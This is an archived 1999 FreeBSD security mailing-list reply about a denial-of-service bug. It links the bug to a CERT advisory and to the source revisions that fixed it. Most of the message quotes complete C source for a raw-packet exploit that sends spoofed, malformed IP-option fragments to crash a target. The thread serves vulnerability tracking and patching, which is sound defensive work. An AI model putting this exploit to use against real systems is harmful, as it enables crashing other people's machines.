From owner-freebsd-security  Mon May 10 20:19: 0 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21])
	by hub.freebsd.org (Postfix) with ESMTP id 967A51591E
	for <freebsd-security@FreeBSD.ORG>; Mon, 10 May 1999 20:18:56 -0700 (PDT)
	(envelope-from gdonl@tsc.tdk.com)
Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191])
	by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id UAA03617;
	Mon, 10 May 1999 20:18:07 -0700 (PDT)
	(envelope-from gdonl@tsc.tdk.com)
Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194])
	by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id UAA26154;
	Mon, 10 May 1999 20:18:05 -0700 (PDT)
Received: (from gdonl@localhost)
	by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id UAA26058;
	Mon, 10 May 1999 20:18:04 -0700 (PDT)
From: Don Lewis <Don.Lewis@tsc.tdk.com>
Message-Id: <199905110318.UAA26058@salsa.gv.tsc.tdk.com>
Date: Mon, 10 May 1999 20:18:03 -0700
In-Reply-To: Darren Reed <avalon@coombs.anu.edu.au>
       "freebsd mbuf crash" (May  5,  1:26am)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Darren Reed <avalon@coombs.anu.edu.au>,
	freebsd-security@FreeBSD.ORG
Subject: Re: freebsd mbuf crash
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I now suspect this is an exploit for the bug mentioned in CERT Advisory
CA-98-13-tcp-denial-of-service.  If so this bug was fixed for FreeBSD
3.0-CURRENT in revision 1.105 of ip_input.c, and revision 1.50.2.22
before 2.2.8-RELEASE.  Both fixes were committed on November 11, 1998.

This exploit's use of a large number of options in the IP header seems
to be the tipoff.


On May 5,  1:26am, Darren Reed wrote:
} Subject: freebsd mbuf crash
} 
} is this one (below) taken care of ?  perhaps a derivitice of this ?
} 
} darren
} 
} /* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998. 
}  * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine.
}  */
} 
} #include <stdio.h>
} #include <stdlib.h>
} #include <netinet/ip.h>
} #define __FAVOR_BSD
} #include <netinet/tcp.h>
} #include <netinet/in.h>
} #include <sys/socket.h>
} #include <arpa/inet.h>
} #include <netdb.h>
} #include <strings.h>
} 
} 
} u_long htona(char *host)
} {
}         u_long  addr;
}         struct  hostent *hp;
} 
}         if ((addr=inet_addr(host)) == INADDR_NONE) {
}                 if ((hp = gethostbyname(host)) == NULL)
}                         return(-1);
}                 bcopy(hp->h_addr_list[0], &addr, sizeof(addr));
}         }       
}         return(addr);
} }
} 
} int main(int argc, char* argv[])
} {
}         char    buf[128];
}         struct  ip *iph = (struct ip *)buf;     
}         u_char  *ipoptions = (u_char *)(buf + sizeof(struct ip));
}         struct  tcphdr *tcph = (struct tcphdr *)(buf + 60);
}         int     s, i;
}         struct  sockaddr_in sin;
} 
}         if (argc != 2) {
}                 printf("usage\n\t%s <host>\n", argv[0]);
}                 exit(1);
}         }
}         s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
}         if (s < 0) {
}                 perror("socket");
}                 exit(1);
}         }
}         sin.sin_family = AF_INET;
}         sin.sin_port = htons(7);
}         sin.sin_addr.s_addr = htona(argv[1]);
}         if (sin.sin_addr.s_addr == -1) {
}                 printf("Error resolving %s\n", argv[1]);
}                 exit(1);
}         }
} 
}         bzero(buf, sizeof(buf));
}         iph->ip_hl=15;
}         iph->ip_v=4;
}         iph->ip_len=htons(124);
}         iph->ip_id= htons(getpid());
}         iph->ip_off= htons(IP_MF);
}         iph->ip_ttl = 255;
}         iph->ip_p = IPPROTO_TCP;
}         bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long));
}         iph->ip_src.s_addr = htona("10.2.3.4");
}         for (i = 0; i < 20;i++) {
}                 ipoptions[i]=0xff;
}         }
}         ipoptions[0] = 0xff; /* Made up option */  
}         ipoptions[1] = 0x1a;
}         memset((char *)&ipoptions[2], 0xff, 37);
}         ipoptions[39] = 1;  /* IP_NOP */
}         tcph->th_sport = htons(5505);
}         tcph->th_dport = htons(23);
}         tcph->th_seq = htonl(0xabcde123);
}         tcph->th_ack = htonl(0x321edcba);
}         tcph->th_flags = TH_ACK | TH_PUSH;
}         tcph->th_win = htons(0x1234);
} 
}         if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
}                 perror("sendto");
}                 exit(1);
}         }
}         if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {   
}                 perror("sendto");
}                 exit(1);
}         }
}         iph->ip_len = htons(80);
}         iph->ip_off = htons(8);
}         if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) {
}                 perror("sendto");
}                 exit(1);
}         }
}         exit(0);
} }
} 
} 
} 
} To Unsubscribe: send mail to majordomo@FreeBSD.org
} with "unsubscribe freebsd-security" in the body of the message
}-- End of excerpt from Darren Reed




To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message